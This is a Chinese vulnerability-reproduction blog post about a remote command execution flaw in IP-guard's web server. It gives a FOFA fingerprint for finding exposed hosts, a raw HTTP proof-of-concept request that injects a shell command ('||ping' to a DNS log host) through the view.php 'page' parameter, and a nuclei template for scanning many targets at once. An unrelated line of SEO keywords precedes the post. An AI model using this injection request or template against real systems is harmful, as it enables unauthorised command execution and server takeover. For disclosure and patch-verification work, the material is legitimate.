网站开发项目需求分析,怎么做网页?,hao123网站模板,专题研究网站建设工作动态免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。
二漏洞影响版本
IP-guard
三网络空间测绘查询
fofa: IP-guard icon_hash2030860561
四漏洞复现 POC:
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc11.jpgformatswfisSplittruepage||ping%20DNSlog HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q0.9
Cookie: yourCookie
Connection: closeping后加上dnslog验证。
五批量检测
id: ip-guard-webserver-rceinfo:name: IP-Guard Webserver 远程命令执行author: xingyunseverity: criticaldescription: |IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。IP-guard WebServer远程命令执行漏洞。攻击者可利用该漏洞执行任意命令获取服务器控制权限。IP-guard icon_hash2030860561reference:- MDPOCS/Ip_Guard_Webserver_View_Rce_Poc.py at 35788...tags: rce,ipguardhttp:- raw:- |GET /ipg/static/appr/lib/flexpaper/php/view.php?doc11.jpgformatswfisSplittruepage||ping%20{{interactsh-url}} HTTP/1.1Host: {{Hostname}}matchers-condition: andmatchers:- type: wordpart: interactsh_protocol # Confirms the DNS Interactionwords:- dnsextractors:- type: kvalkval:- interactsh_ip # Print remote interaction IP in output
